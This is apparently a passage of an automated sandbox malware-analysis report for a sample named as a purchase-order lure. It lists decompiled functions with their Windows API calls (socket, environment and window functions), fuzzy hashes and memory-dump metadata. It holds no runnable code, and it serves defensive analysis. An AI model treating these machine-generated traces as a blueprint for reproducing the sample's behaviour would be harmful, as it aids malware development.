                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __setmode$DebugOutputString_fprintf
                                                    • String ID:
                                                    • API String ID: 1792727568-0
                                                    • Opcode ID: 5d4322aea4207270e306f71f31351bd3950e7b1fce0631062c9bba007b08485e
                                                    • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                    • Opcode Fuzzy Hash: 5d4322aea4207270e306f71f31351bd3950e7b1fce0631062c9bba007b08485e
                                                    • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                    APIs
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                    • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                    • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                    • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                    APIs
                                                      • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                      • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                      • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                    • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                    • String ID: cdecl
                                                    • API String ID: 3850814276-3896280584
                                                    • Opcode ID: 37a567b240226cbd2baa50f9abe85d2c250fbd9e026a126a46b873b91be0fe80
                                                    • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                    • Opcode Fuzzy Hash: 37a567b240226cbd2baa50f9abe85d2c250fbd9e026a126a46b873b91be0fe80
                                                    • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                    APIs
                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                    • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                    • _memmove.LIBCMT ref: 0046D475
                                                    • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 2502553879-0
                                                    • Opcode ID: 4777d02d04a30dcfdb085943b42a4ccb2e6b73bd431d008d3c99f42dcf393561
                                                    • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                    • Opcode Fuzzy Hash: 4777d02d04a30dcfdb085943b42a4ccb2e6b73bd431d008d3c99f42dcf393561
                                                    • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                    APIs
                                                    • SendMessageW.USER32 ref: 00448C69
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                    • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                    • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                    • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                    APIs
                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastacceptselect
                                                    • String ID:
                                                    • API String ID: 385091864-0
                                                    • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                    • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                    • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                    • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                    • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                    • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                    • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                    • GetStockObject.GDI32(00000011), ref: 00430258
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                    • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                    • String ID:
                                                    • API String ID: 1358664141-0
                                                    • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                    • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                    • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                    • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                    • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0
                                                    • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                    • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                    • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                    • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                    • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                    • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                    • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                    • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                    • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                    • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 0043392E
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • __wsplitpath.LIBCMT ref: 00433950
                                                    • __wcsicoll.LIBCMT ref: 00433974
                                                    • __wcsicoll.LIBCMT ref: 0043398A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                    • String ID:
                                                    • API String ID: 1187119602-0
                                                    • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                    • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                    • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                    • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                    • String ID:
                                                    • API String ID: 1597257046-0
                                                    • Opcode ID: 0b2002a4149e2d8beddbe853b39040ac6e32887258a59906f1cc641053fbe158
                                                    • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                    • Opcode Fuzzy Hash: 0b2002a4149e2d8beddbe853b39040ac6e32887258a59906f1cc641053fbe158
                                                    • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                    • __malloc_crt.LIBCMT ref: 0041F5B6
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                    • String ID:
                                                    • API String ID: 237123855-0
                                                    • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                    • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                    • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                    • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyObject$IconWindow
                                                    • String ID:
                                                    • API String ID: 3349847261-0
                                                    • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                    • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                    • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                    • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                    • String ID:
                                                    • API String ID: 2223660684-0
                                                    • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                    • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                    • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                    • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                    • LineTo.GDI32(?,?,?), ref: 00447326
                                                    • EndPath.GDI32(?), ref: 00447336
                                                    • StrokePath.GDI32(?), ref: 00447344
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
